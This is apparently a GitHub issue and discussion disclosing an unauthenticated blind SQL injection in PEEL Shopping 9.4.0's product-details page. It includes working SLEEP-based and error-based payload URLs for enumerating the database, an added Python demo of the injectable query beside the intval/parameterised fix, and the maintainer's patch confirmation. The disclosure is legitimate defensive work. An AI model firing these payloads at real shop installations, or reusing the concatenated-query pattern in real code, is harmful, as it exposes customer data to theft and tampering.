SQL Injection in "produit_details.php?id" parameter (Unauthenticated) #3

Closed
faisalfs10x opened this issue Jul 11, 2021 · 5 comments

faisalfs10x commented Jul 11, 2021

Vulnerability Name: SQL Injection in "produit_details.php?id" parameter

Date of Discovery: 10 July 2021

Product version: 9.4.0. Download link

Author: faisalfs10x

Vulnerability Description: A public user/guest (unauthenticated) can inject a malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon a successful SQL injection attack, the attacker can read sensitive data from the database or modify database data.

Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]

Proof of Concept:

1) Assuming the out-of-the-box installation of peel-shopping_9_4_0 uses the database name peel. This query checks whether database() is LIKE hex(%peel%); it will delay for 7 seconds before redirecting to the homepage (http://localhost/peel-shopping_9_4_0/), which indicates a TRUE SQL statement, meaning the database name is like "peel".

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)

[PoC enum db name image: enum_dbname]

2) Assuming the web application is using a MariaDB database server: check whether the DB version is LIKE hex(%MariaDB%); it will delay for 5 seconds if TRUE.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)

[PoC enum MariaDB image: enum_dbversion(MariaDB)]

3) By default, the database has a table named peel_produits. This query checks whether the table peel_produits exists; it will delay for 10 seconds if TRUE, else it will redirect to the homepage instantly.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)

[PoC enum table peel_produits image: enum_tablename]

To produce a SQL syntax error, it is possible to intercept the request before it is redirected to the homepage using a tool like Burp Suite (Repeater).

Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)

  1. [MariaDB disclosed image: sql_error_mariadb]

  2. [peel_produits table_name disclosed image: sql_errorbased2]

Dump table name = peel_profil

[image: dump_table_peel_profil]

Consequences:

  • Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
  • Integrity: Just as it may be possible to read sensitive information, e.g. sensitive client/customer data, it is also possible to make changes to or even delete this information with a SQL Injection attack.

Mitigation: Use Prepared Statements (with Parameterized Queries). It would also be good to cast to integer to ensure only numerical data is accepted in the 'id' parameter, e.g. intval($_GET['id']).
cc @advisto

References for vulnerability mitigation: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
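The following is an added example, not code from the PEEL Shopping project or from the issue author. It rebuilds the shape of the time-based payload used in the PoC above and shows the bug pattern (an unquoted numeric `id` interpolated into the query) next to the mitigation the report asks for (an `intval`-style cast plus a parameterised query). SQLite is used as an offline stand-in for MySQL/MariaDB; since SQLite has no `SLEEP()`, the inference oracle here is boolean (row returned or not) rather than timing-based. The table `peel_produits` and its columns `id`, `nom`, `prix` are assumptions modelled on the issue text, and the `php_intval` helper is a hypothetical imitation of PHP's `intval()` for non-numeric input.

```python
"""Added example for the produit_details.php?id SQL injection report.

Not project code. SQLite stands in for MariaDB, so the blind oracle is
boolean rather than time-based. Table/column names are assumptions.
"""
import re
import sqlite3
from typing import Optional, Tuple


def build_time_payload(condition: str, base: int = 7, penalty: int = 5) -> str:
    """Rebuild the PoC payload: SLEEP(base - IF(condition, 0, penalty)).

    Note the false branch still sleeps base - penalty seconds (2 s for the
    first PoC), so a timing threshold must sit between the two values rather
    than treating "no delay" as the false case.
    """
    return (
        f"(SELECT 1337 FROM (SELECT(SLEEP({base}-(IF({condition},0,{penalty})))))FSXX)"
    )


def expected_sleep(condition_true: bool, base: int = 7, penalty: int = 5) -> int:
    """Seconds MariaDB would sleep for the payload above."""
    return base if condition_true else base - penalty


def php_intval(value: str) -> int:
    """Hypothetical imitation of PHP intval() on strings: leading integer or 0."""
    match = re.match(r"\s*([+-]?\d+)", value)
    return int(match.group(1)) if match else 0


def make_db() -> sqlite3.Connection:
    """Constructed sample database with an assumed peel_produits table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE peel_produits (id INTEGER PRIMARY KEY, nom TEXT, prix REAL)")
    conn.executemany(
        "INSERT INTO peel_produits VALUES (?, ?, ?)",
        [(1, "Chaise", 49.9), (2, "Table", 199.0)],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> Optional[Tuple]:
    """Bug pattern: untrusted text is concatenated straight into the WHERE clause."""
    sql = f"SELECT id, nom, prix FROM peel_produits WHERE id={raw_id}"
    return conn.execute(sql).fetchone()


def hardened_lookup(conn: sqlite3.Connection, raw_id: str) -> Optional[Tuple]:
    """Mitigation from the report: integer cast, then bind as a parameter."""
    product_id = php_intval(raw_id)
    return conn.execute(
        "SELECT id, nom, prix FROM peel_produits WHERE id=?", (product_id,)
    ).fetchone()


def blind_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-blind inference through the vulnerable lookup.

    The injected scalar subquery yields 1 (an existing product id) when the
    condition holds and 0 (no such row) otherwise; this is the SQLite analogue
    of the 7 s / 2 s timing difference in the MariaDB payload.
    """
    payload = f"(SELECT CASE WHEN {condition} THEN 1 ELSE 0 END)"
    return vulnerable_lookup(conn, payload) is not None


def demo() -> dict:
    """Run the vulnerable and hardened paths against the same inputs."""
    conn = make_db()
    table_check = (
        "EXISTS(SELECT 1 FROM sqlite_master WHERE type='table' AND name='{}')"
    )
    return {
        "normal": vulnerable_lookup(conn, "1"),
        "table_exists": blind_oracle(conn, table_check.format("peel_produits")),
        "table_missing": blind_oracle(conn, table_check.format("peel_profil")),
        "hardened_payload": hardened_lookup(conn, "(SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END)"),
        "hardened_normal": hardened_lookup(conn, "2"),
    }


if __name__ == "__main__":
    print(build_time_payload("DATABASE() LIKE 0x257065656c25"))
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened path returns no row for the injected payload because the cast reduces it to `0` before the query is built; for a purely numeric parameter that cast alone closes the hole, which is what the maintainer's fix below does, while parameter binding keeps the query safe even if a non-numeric field is later added.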

@advisto advisto self-assigned this Jul 13, 2021

advisto commented Jul 13, 2021

Thanks.

This was due to a change of structure to get product details, in order to potentially link it to a product API instead of reading data from MySQL.
The previously implemented protection was no longer active, thus it was necessary to add an intval on the GET parameter.

=> Subject closed

@advisto advisto closed this as completed Jul 13, 2021
@faisalfs10x

So, I noticed you made code changes on this line, right? File produit_details.php. But the bug still affects version 9.3.0 anyway.

[image: code_changes]


advisto commented Jul 13, 2021

The version which can be downloaded on our website is now patched

@faisalfs10x

That's great. Thanks for acknowledging the vulnerability.


advisto commented Jul 13, 2021

Thanks for your remarks.
